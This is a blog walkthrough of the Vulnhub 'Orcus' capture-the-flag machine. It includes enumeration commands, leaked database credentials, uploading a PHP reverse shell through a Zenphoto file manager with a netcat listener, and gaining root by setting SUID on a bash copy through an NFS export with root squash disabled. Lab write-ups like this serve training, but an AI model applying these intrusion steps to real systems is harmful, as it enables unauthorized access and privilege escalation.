Still enjoying some days off from work because of Easter holiday. To fill my time even more, I decided to spend some time with the hackfest2016: Orcus game. The difficulty level on this one is rated hard, I expect it to be somewhat harder than both hackfest2016: Sedna and Quaoar game.
Description
From Vulnhub:
If youre stuck enumerate more! Seriously take each service running on the system and enumerate them more!
Goals: This machine is intended to take a lot of enumeration and understanding of Linux system.
There are 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box that is different from the others from this series (Quaoar and Sedna) find why its different.
Feedback: This is my third vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter simon.nolet@hotmail.com
Special Thanks to madmantm for testing this machine
Service discovery
This game did not require hunting for its IP address since it is shown already at the login prompt. Cutting directly to service discovery:
| Command |
|---|
| sudo nmap -p1-65535 -A -T4 -sS 192.168.110.18 |
Results:
| Port | Service | Product | Hostname |
|---|---|---|---|
| 22 | ssh | OpenSSH | |
| 53 | domain | ISC BIND | |
| 80 | http | Apache httpd | |
| 110 | pop3 | ||
| 111 | rpcbind | ||
| 139 | netbios-ssn | Samba smbd | ORCUS |
| 143 | imap | Dovecot imapd | |
| 443 | ssh | OpenSSH | |
| 445 | netbios-ssn | Samba smbd | ORCUS |
| 993 | imap | Dovecot imapd | |
| 995 | pop3s | ||
| 2049 | nfs_acl | ||
| 35118 | mountd | ||
| 40711 | nlockmgr | ||
| 43124 | mountd | ||
| 58413 | mountd |
Orcus has some more services than the other two games in this series. Appears the hint about enumerating each service is legit. Those mount daemons peaked my interest, amongst other interesting finds:
Port 80
| Key | Value |
|---|---|
| http-robots.txt | 30 disallowed entries (15 shown) |
smb-os-discovery
| Key | Value |
|---|---|
| OS | Windows 6.1 (Samba 4.3.11-Ubuntu) |
| Computer name | \x00 |
| NetBIOS computer name | ORCUS\x00 |
| Workgroup | WORKGROUP\x00 |
| System time | 2017-04-14T05:39:36-04:00 |
smb-security-mode
| Key | Value |
|---|---|
| account_used | guest |
| authentication_level | user |
| challenge_response | supported |
| message_signing | disabled (dangerous, but default) |
Finding exported NFS directories
Finding out which NFS directories Orcus exports:
$ sudo apt-get update $ sudo apt-get install nfs-common $ /sbin/showmount -e 192.168.110.18
Orcus are exporting the /tmp directory.
Enumerating on port 80
$ dirb http://192.168.110.18
The most interesting findings (some have been left out):
| Folder / item | Comment |
|---|---|
| /phpmyadmin/ | No version number found. Uses content-security-policy |
| /install/ | Error message stating “Database is currently Off-line!”. Stems from Exponent CMS |
| /admin/ | Blank page, comment in HTML: This is a backup taken from the backups |
| /backups/ | Lists two files: SimplePHPQuiz-Backupz.tar.gz and ssh-creds.bak. Ssh-creds.bak gives HTTP 403 forbidden |
| /cron/ | Lists out PHP files |
| /external/ | Lists a bunch of external programs. Found interesting ExtPrograms.csv |
| /files/ | Lists folders. Found interesting subfolder /uploads |
| /framework | Found interesting file /conf/config.php.example |
| /tmp/ | Lists folders. Could be related to other /tmp folder found |
| /xmlrpc.php | Indicator of something, perhaps? |
robots.txt
Disallow entries (just a section of it):
| Folder / item | Comment |
|---|---|
| /exponent.js.php | JS loaded as PHP |
| /exponent.js2.php | JS loaded as PHP |
| /exponent_php_setup.php | Tosses notices: Use of undefined constant BASE – assumed ‘BASE’ |
| /getswversion.php | Return JSON |
| /login.php | Error message stating “Database is currently Off-line!”. Stems from Exponent CMS |
| /site_rss.php | Error message stating “Database is currently Off-line!”. Stems from Exponent CMS |
| /source_selector.php | Yields Page “/var/www/html/themes/retrotheme/index.php” not readable. |
| /thumb.php | Shows not found image |
| /ABOUT.md | Related to Exponent Content Management System |
| /CHANGELOG.md | Reveals Related to Exponent Content Management System Version 2.3.9 |
| /CREDITS.md | Related to Exponent Content Management System |
| /INSTALLATION.md | Installation instructions |
| /LICENSE | GPL license |
| /README.md | Standard README file |
| /RELEASE.md | Shows version numbers: ## 2.3.8 and v2.3.7 |
| /files/ | Same as previously found |
| /tmp/ | Same as previously found |
Flags
Excuse me for all the data listed before the meaty part. I somehow felt it was necessary. Moving on to the meatier part, flag hunting!
Flag 1
From all the data found above I drew the conclusion that targeting phpMyAdmin was pointless since I could not find its version number. Actually its not, but for the sake of this game it was. Anyway, I noticed there were some error messages about the database wasn’t operating. And, I also found a backup file. Looked at the backup file first:
$ wget http://192.168.11.18/backups/SimplePHPQuiz-Backupz.tar.gz $ tar zxvf SimplePHPQuiz-Backupz.tar.gz $ cd SimplePHPQuiz/ $ grep -Rni password *
Found this snippet in includes/db_conn.php:
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');
Logging into phpMyAdmin using these credentials:
Browsed through the available databases and there were some empty ones. I supposed some of these databases were real and their associated product had some sort of vulnerabilities I could exploit for getting shell. Ran each one through searchsploit. A couple of Blind SQL injection here and there popped up, but the product with most exploits recorded were Zenphoto. Its database showed up empty so I reckoned I needed to fill it! But first, finding out if Zenphoto is available (since it didn’t show up using dirb).
The setup went through using the dbuser:dbpassword credentials from earlier. At the last step of setup I created an admin:admin user. Afterwards I got redirected to login page (/zenphoto/zp-core/admin.php).
Once in I started getting acquainted with Zenphoto. Found a tab mentioning plugins and inside it I found a plugin that provided file handling for the upload/files tab (elFinder). Enabled it and found where I could use it.
Uploaded a test PHP file and figured it got uploaded to /zenphoto/uploaded/. At that point I was set to prepare my trusty Shelly shell again.
Shell access
Preparing Shelly (on Parrot Linux):
$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php
Then I made sure to prep Shelly with my IP and listening port (4444). Next, I set up a listener using Netcat:
$ nc -lvp 4444
Then uploaded Shelly using elFinder. Activating Shelly was just as easy as going to /zenphoto/upload/shelly.php.
The very first commands I ran after getting shell were:
$ whoami
$ whereis python
$ python -c 'import pty; pty.spawn("/bin/bash")'
Just like the Sedna game, the flag was hidden in /var/www/flag.txt: 868c889965b7ada547fae81f922e45c4
Flag 2
My first thought was Orcus could be vulnerable to Dirty COW. A quick uname -a revealed it running kernel 4.4.0-45-generic #66 which according to this post isn’t vulnerable. Tried some other exploits without luck. Considered this a dead end for exploits at the moment.
In the section named “Finding exported NFS directories” I found a /tmp directory exposed. Thinking now is the time to look more into it. Trying to mount it locally in Parrot:
$ sudo mkdir /mnt/orcus $ sudo mount -t nfs 192.168.110.18:/tmp /mnt/orcus
Nothing much of value was found inside this folder. Pondering about the next logical step I started looking into permissions by creating a couple of files.
First I created an empty file using my regular local user. Doing a ls on the shell side showed the file being owned by 1000:1000. Doing the same maneuver using local root account showed the newly made file owned by root:root. So basically, in theory, I could just copy a shell from Orcus and set SUID? So I tried:
On Orcus shell:
$ cd /tmp $ cp /bin/bash pwn
On Parrot machine:
$ sudo su $ chown root:root pwn $ chmod u+s pwn
Back in Orcus shell again:
$ ./pwn -p
Navigated to /root and found the flag: 807307b49314f822985d0410de7d8bfe
Googled this procedure and found this. Ahem. Nice.
Flag 3
According to the game description the third flag was a post exploitation flag. Not sure on this one, though. I did a some efforts to solve it by adding a makeshift SSH public key, adding it to Orcus roots authorized_keys file. Then logged in through SSH and looked around. Found nothing to keep me going.
Flag 4
Finding the fourth flag was quite funny. Started looking into the /home folder. Nothing in there, except for a hidden folder called .youwillfindnothinghere. Inside that one was just a text file (itoldyou) containing nothing. Moved on looking at /etc/passwd and /etc/shadow to find if there were any users set up with a home directory. My hypothesis was that if there’s a mismatch between /home and the definition, then there’s something fishy going on.
Using
$ cat /etc/passwd | grep home
I found that user Kippo was such a user. Googling if Kippo could be a kind of software, I found that it is a SSH honeypot. Going further finding where Kippo is installed:
$ whereis kippo
It lived in /etc/kippo. Looking at kippo.cfg I found a curious looking flag:
# Port to listen for incoming SSH connections. # user:1:TH!SP4SSW0RDIS4Fl4G!
reedphish 